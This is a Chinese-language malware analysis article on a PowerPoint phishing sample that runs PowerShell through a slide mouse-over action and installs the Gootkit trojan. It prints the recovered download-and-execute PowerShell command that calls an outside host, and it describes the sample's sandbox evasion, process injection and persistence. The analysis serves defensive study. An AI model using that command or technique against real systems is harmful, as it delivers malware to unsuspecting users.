新型PPT釣魚攻擊分析
* 本文作者:蘭雲科技銀河實驗室@diffway,本文屬FreeBuf原創獎勵計劃,未經許可禁止轉載
1 概述
最近出現了一種新型的PPT釣魚攻擊方式,該種釣魚攻擊方式不需要宏就能實現執行powershell的功能,通過網路下載gootkit木馬進行控制。
2 分析
樣本 MD5:3bff3e4fec2b6030c89e792c05f049fc
在拿到樣本我們放到虛擬機中進行執行,可以看到以下,但是這並不會觸發攻擊
當我們用F5放映這個文檔後,並把滑鼠放到 Loading…Please wait 這個上面,就可以看到如下的畫面,提示我們要啟動一個外部程序
這個時候我們在點擊啟動之後,會看見一個powershell的窗口一閃而過,可以知道樣本執行了一段powershell的腳本
我們將樣本後綴名改為zip,看看這段powershell 代碼在何處,我們最終在pptslides中找到了這段powershell腳本
我們在slide1.xml.rels 中找到這段powershell腳本,我們可以看到Id為rId2,
我們在對應的slide1.xml 中id為rId2 對應的動作位為,當滑鼠覆蓋時,就觸發這個外部事件
我們來看看這段powershell 腳本(已還原),可以看到是下載一個php文件放到臨時文件夾,並重命名為ii.jse
powershell -NoP -NonI -W Hidden -ExecBypass "IEX (New-Object System.Net.WebClient).DownloadFile( http:// + cccn.nl/ + c.php ,"$env:tempii.jse");Invoke-Item "$env:tempii.jse""
我們可以看到這個js 文件,這個文件是經過強混淆的作用是下載個exe文件
我們來詳細分析下下載到的PE文件
下圖為樣本的大致流程
在樣本的開始階段,做了些反模擬機的工作,比如一些錯誤的函數調用,看返回值是否被修改,執行很多無效指令,來達到模擬機指令的閾值等等
我們來看看這個樣本中的sub_41E160中的無效指令
之後一個大的sleep來對抗沙箱,因為很多沙箱是有時間範圍的
之後在解密出一段shellcode進行執行,這段shellcode的主要作用就是解密出一個pe文件然後載入運行,解密出的PE文件
將這個PE文件dump出來,看以下基本信息
樣本首先會獲取當前樣本名稱和mstsc.exe比較,如果不相同,則進入注入模塊
樣本首先會創建mstsc.exe
然後通過ZwCreateSection和ZwMapViewOfSection 進行注入,並在注入後,獲取啟動地址並進行修改
我們手動附加,進行修改,然後修改EIP,進行調試,我們將開始地址修改為下面的樣子
由於和原文件代碼相同,我們直接到文件名比較的地方,這裡比較相同後,首先會獲取進程的許可權
如果判斷是低許可權的進程,則會通過ShellExecuteEx 使用管理員許可權啟動
之後在比較當前進程不是IE和不是任務進程後,打開BIOS註冊表,查找是否在虛擬機中
並從系統信息中找到沙箱的蛛絲馬跡這個是尋找Sandbox
查找BOCHS
查找的沙箱還有 VBOX 、QEMU、SMCI、Vmware、FTNT-1、VirtualBox、
如果查找到沙箱則進入死循環
然後拷貝自身到如下目錄下,重命名位mqnets.exe,並執行
並刪除自身
我們看看在拷貝到IE目錄下樣本會做些什麼,在這裡比較是在IE目錄下的時候,會發生跳轉
可以通過偽代碼可以發現在通過比較後。會執行一個線程,我們看看這個線程
開頭還是一段判斷自己是否在虛擬機中
設置了4個環境變數分別是
Standalonemtm true
Vendor_id exe_scheduler_3333
Mainprocessoverride svchost.exe
RandomListenPortBase 6000
這個線程的主要作用是開啟下面的5個線程
我們首先看第一個線程,主要作用是連接一個網址
在連接時候,還包括了探測IE代理的設置,如果發現,進行設置
關閉重定向和加入查詢認證(SSL)
將接收的文件內容放到註冊中
註冊表為 HKEY_CURRENT_USERSoftwareinaryImage32_0
HKEY_CURRENT_USERSoftwareinaryImage32_1
第二個線程主要是將第一步下載的創建成文件
將IE的保護模式設置位禁用
第三個線程將文件進行注入
第四個線程主要是保持持久化
創建inf文件
設置啟動
使用 IEAKGroupPolicyPendingGPOs key 去保持持久化
第五個線程主要是判斷Temp文件是否如下圖的文件,如果有殼殺死自身,並刪除自身
總結
樣本在對抗沙箱和模擬機中有很強的針對性,在持久話方面也很獨特,值得研究一下
* 本文作者:蘭雲科技銀河實驗室@diffway,本文屬FreeBuf原創獎勵計劃,未經許可禁止轉載
※你可以用U盤黑掉一輛馬自達
※基於unicorn-engine的虛擬機的實現(WxSpectre)
※企業安全建設之路:埠掃描(下)
※VM真的比Container更安全嗎?
※CAN匯流排簡介:如何以編程方式控制汽車
TAG:FreeBuf |
※高級USB key釣魚攻擊的三種攻擊場景(二)
※高級USB key釣魚攻擊的三種攻擊場景(一)
※疑似蔓靈花APT團伙向國內發起郵件釣魚攻擊
※釣魚新姿勢:全屏API偽裝瀏覽器界面方式分析
※加密貨幣泄露,黑客利用釣魚電子郵件將DADI ICO投資者作為目標
※DNF:DPL釣魚大賽通關攻略要點 輔助職業接下來將會有強勢表現
※FBI和韓國警方聯合打擊「Ripple XRP」加密貨幣釣魚騙局
※三種高級USB密鑰網路釣魚攻擊場景
※攻破黑市之拿下吃雞DNF等遊戲釣魚站群
※Iphone新型號的推出,促使網路釣魚網站數量大幅增加
※關於釣魚WIFI的一些騷操作
※《終極釣魚模擬器》將登陸PS4/NS/Xbox平台
※Anomali團隊捕獲了一個針對中國政府網站的釣魚攻擊行動
※動物組織PETA譴責《孤島驚魂5》釣魚系統:魚很痛苦
※Netmarble新作釣魚手游《釣魚大亨》正式配信
※動保組織PETA譴責《孤島驚魂5》釣魚系統
※重出水面:伊朗背景惡意組織新型網路釣魚攻擊分析
※火絨安全周報:蘋果警告用戶警惕釣魚郵件 GitHub遭最嚴重DDoS攻擊
※DarkHydrus 組織利用開源工具發動釣魚攻擊
※Sofacy黑客組織又現身!釣魚郵件攻擊多地政府機構